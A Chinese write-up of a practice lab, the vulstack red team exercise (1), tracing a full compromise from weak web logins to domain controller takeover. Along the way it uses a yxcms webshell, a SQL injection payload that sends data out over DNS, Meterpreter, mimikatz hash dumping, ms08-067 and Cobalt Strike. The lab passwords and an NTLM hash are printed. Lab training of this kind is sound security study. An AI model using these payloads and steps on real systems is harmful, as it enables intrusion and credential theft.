一、环境搭建:
1、根据作者公开的靶机信息整理:
虚拟机初始所有统一密码:hongrisec@2019
 
因为登陆前要修改密码,改为了panda666...
 
2、虚拟网卡网络配置:
①Win7双网卡模拟内外网:
外网:192.168.1.43,桥接模式与物理机相通
内网:192.168.52.143
 
还需要修改以下网络配置,将网段设置好
 
②Win2003只有内网:
内网:192.168.52.138,仅主机模式
 
③Win2008只有内网:
内网:192.168.52.141,仅主机模式
 
④攻击机:
kali:192.168.1.2
win10:192.168.1.7
 
然后启动Phpstudy即可开启web服务
 
 
二、Web层渗透:
1、信息收集:
①服务和端口
 
访问80端口的http服务,发现php探针,收集一些有用的信息:
绝对路径:C:/phpStudy/WWW
 
②目录扫描
发现phpmyadmin、beifen.rar文件
 
访问phpmyadmin页面,手动试了常见的弱口令,root/root进去了
 
查看是否可以intoutfile直接写入一句话,但secure_file_priv为NULL所以不能指定写入的路径,先放一下,看看备份文件有什么可利用的
SHOW VARIABLES LIKE '%secure%'
 
访问文件路径,把备份文件下载
 
发现是yxcms的源码备份文件
 
并且通过升级日志,知道版本为1.2.1
 
 
2、漏洞挖掘:
①存储型XSS:
留言板处,输入xss payload,点击留言:
 
②信息泄露+弱口令进后台:
 
访问后台地址,输入默认账号密码:admin/123456,查看留言是,发现刚才的xss payload执行了,get√ N0.1
 
③任意文件写入漏洞:
前台模板-->管理模板文件
 
点击新建
 
直接写入一句话木马,然后保存
 
根据备份文件,找到模板文件的存放路径
 
访问文件,成功getshell
 
④delete注入:
勾选删除碎片时,用burp抓包
 
加入单引号发现会报错
 
网上找的payload,具体就不进行测试了:
and if((select load_file(concat('\\\\',(select database()),'.xxxx.ceye.io\\abc'))),1,1))--
 
 
⑤还可以通过phpmyadmin全局日志getshell,具体方法也很简单,就不演示了
 
 
三、内网渗透
1、win7本机信息收集
已经成功getshell了,使用蚁剑连接,准备进行内网渗透,为了熟悉MSF,所以打算使用MSF进行
①上传木马并执行
成功拿到meterpreter的会话
 
直接利用getsystem提权(因为没有uac限制)
 
②内网信息收集
发现有域环境:god.org,内网ip为192.168.52.143,DNS服务器(一般是域控):192.168.52.138
 
添加路由进行横向移动
 
利用frp搭建socks代理
上传frp客户端及配置文件到目标机器
 
启动服务端
 
这里我利用蚁剑直接执行客户端,因为msf执行有点问题没解决...
 
探测域内存活主机:
run windows/gather/enum_ad_computers
 
域控列表
run windows/gather/enum_domains
 
所有存活主机
 
dump当前机器的所有hash
load mimikatz
msv
 
kerberos
 
信息整理:
域控2008:OWA.god.org 192.168.52.138
域机器2003:root-tvi862ubeh.god.org 192.168.52.141
web服务器win7:192.168.52.143
 
密码hash整理:
Administrator:ntlm:bd692185c355484e973645bd6a8e4505 明文:panda666...
 
 
2、横向移动拿下域控:
①ms08067(注意payload使用bind),成功拿下win2003域机器
 
②利用CobaltStrike的psexec拿下域控
1.将msf的会话派生给CS,然后抓取凭证,利用smb beacon上线域控
 
成功拿下域控beacon
 
2.转储域内所有hash
 
四、总结:
①通过目录扫描得到备份文件,利用yxcms历史漏洞getshell
②利用msf进行常规内网信息收集
③添加路由+frp搭建socks代理进行内网横向移动
④通过ms08-067漏洞拿下03域机器
⑤利用CS的smb beacon成功拿下域控权限

vulstack红队评估(一)的更多相关文章

  1. vulstack红队评估(五)

    一.环境搭建: ①根据作者公开的靶机信息整理 虚拟机密码: Win7: heart 123.com    #本地管理员用户 sun\Administrator dc123.com    #域管用户,改 ...

  2. vulstack红队评估(四)

    一.环境搭建: ①根据作者公开的靶机信息整理 虚拟机密码: ubuntu: ubuntu:ubuntu   win7: douser:Dotest123   Win2008 DC: administr ...

  3. vulstack红队评估(三)

    一.环境搭建: ①根据作者公开的靶机信息整理 没有虚拟机密码,纯黑盒测试...一共是5台机器,目标是拿下域控获取flag文件   ②虚拟机网卡设置 centos双网卡模拟内外网: 外网:192.168 ...

  4. vulstack红队评估(二)

    一.环境搭建: 1.根据作者公开的靶机信息整理: 靶场统一登录密码:1qaz@WSX     2.网络环境配置: ①Win2008双网卡模拟内外网: 外网:192.168.1.80,桥接模式与物理机相 ...

  5. ATK&CK红队评估实战靶场 (一)的搭建和模拟攻击过程全过程

    介绍及环境搭建 靶机地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2 官方靶机说明: 红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练 ...

  6. ATT&CK红队评估实战靶场(一)

    靶机下载地址 http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 攻击拓扑如下 0x01环境搭建 配置两卡,仅主机模式192.168.52.0网段模拟内 ...

  7. Red Team 指南-第1章 红队和红队概述

    第1章 红队和红队概述 贡献者:Tony Kelly @infosectdk # 翻译者 BugMan 什么是红队?它来自哪里? 红队的起源是军事起源.人们意识到,为了更好地防御, 需要攻击自己的防御 ...

  8. 红队(red team)

    红队资源相关 https://threatexpress.com/redteaming/resources/ 红队相关技术 https://github.com/bluscreenofjeff/Red ...

  9. ATT&CK实战系列 红队实战(一)————环境搭建

    首先感谢红日安全团队分享的靶机实战环境.红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习.视频教程.博客三位一体学习. 靶机下载地址:http://vulnstack.qiyuanxue ...

随机推荐

  1. [JavaWeb基础] 020.Velocity 模板引擎简单示例

    1.什么是Velocity 一种J2EE的前端模版技术,和JSP,Freemarker差不多,都是用来展示网页内容的.和JSP不同的是velocity只能显示Action中的数据,不能处理数据.不能写 ...

  2. 【CTFHUB】Web技能树

    Web HTTP协议 请求方式

  3. windows文本转语音 通过java 调用python 生成exe可执行文件一条龙

    我已记不清 我失败过多少次 ,找过多少资料 ,但是功夫不负有心人 ,还是成功了. 所有资料和需要的语音模块的资料以放置在文章末尾, 有些是引用别人的博客的部分内容, 原文是在有道云笔记,所以没有图,请 ...

  4. “造轮运动”之 ORM框架系列(一)~谈谈我在实际业务中的增删改查

    想想毕业已经快一年了,也就是大约两年以前,怀着满腔的热血正式跨入程序员的世界,那时候的自己想象着所热爱的技术生涯会是多么的丰富多彩,每天可以与大佬们坐在一起讨论解决各种牛逼的技术问题,喝着咖啡,翘着二 ...

  5. Rocket - tilelink - Atomics

    https://mp.weixin.qq.com/s/TSwKL_qm-b-0e8x7r--hhg   简单介绍Atomics中数学运算.逻辑运算的实现.   ​​   1. io   Atomics ...

  6. js函数prototype属性学习(二)

    继续探讨js对象的prototype属性,前面已经看到在创建完一个对象之后,随时都会有一个_proto_属性伴随所有,那么,这个_proto_又是用来干嘛的,面试时问的高大上的原型链又是怎么回事? 拿 ...

  7. 从按下url到显示页面

    从按下url到渲染页面流程图 处理输入信息 检查用户输入 当用户在地址栏中输入一个查询关键字时,地址栏会判断输入的关键字是搜索内容,还是请求的 URL.如果是搜索内容,地址栏会使用浏览器默认的搜索引擎 ...

  8. ASP.NET防止自己网站的资源被盗(通过IHttpHandler 带样例说明)

    我这里用的图片被盗举例子 一个正常的网页 <%@ Page Language="C#" AutoEventWireup="true" CodeBehind ...

  9. Java 第十一届 蓝桥杯 省模拟赛 递增序列

    问题描述 在数列 a[1], a[2], -, a[n] 中,如果 a[i] < a[i+1] < a[i+2] < - < a[j],则称 a[i] 至 a[j] 为一段递增 ...

  10. Java实现 LeetCode 458 可怜的小猪

    458. 可怜的小猪 有 1000 只水桶,其中有且只有一桶装的含有毒药,其余装的都是水.它们从外观看起来都一样.如果小猪喝了毒药,它会在 15 分钟内死去. 问题来了,如果需要你在一小时内,弄清楚哪 ...